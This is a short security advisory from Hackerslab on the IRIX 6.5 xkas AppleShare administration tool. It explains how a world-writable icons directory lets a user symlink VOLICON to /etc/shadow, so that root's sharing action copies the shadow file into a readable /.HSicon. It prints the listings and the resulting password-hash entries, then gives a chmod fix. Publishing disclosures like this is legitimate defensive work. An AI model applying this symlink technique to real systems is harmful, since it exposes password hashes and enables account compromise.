=============================================================================
[ Hackerslab bug_paper ] Xkas application vulnerability
=============================================================================
File : /usr/etc/appletalk/xkas application
SYSTEM : tested irix 6.5
INFO :
Xkas is a server administration tool for appleshare. Misconfiguration by the user with the root privilege could lead to a serious security vulnerability.
.HSResource directory and .HSicon file is created when sharing a directory.
Creation of the HSicon file is accomplished by copying the /var/adm/appletalk/icons/VOLICON file. A problem occurs during this process because the permission of /var/adm/appletalk/icons directory is set to 777 (world-writeable).
Link the wanted file with VOLICON like the following.
$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx 4 root sys 57 Jan 25 03:12 .
drwxr-xr-x 6 root sys 4096 Jan 24 16:05 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource
lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON -> /etc/shadow
When the administrator uses the /usr/etc/appletalk/xkas directory to share the root directory, the following files are created in the root.
$ ls -al /
total 17099
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource
-rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon
(etc..)
$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)
SOLUTION :
Remove other-write permission, contact your vendor and get a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons
==-------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* * Kim Yong-Jun
* ** ** * loveyou@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------==
¿ëÁØ
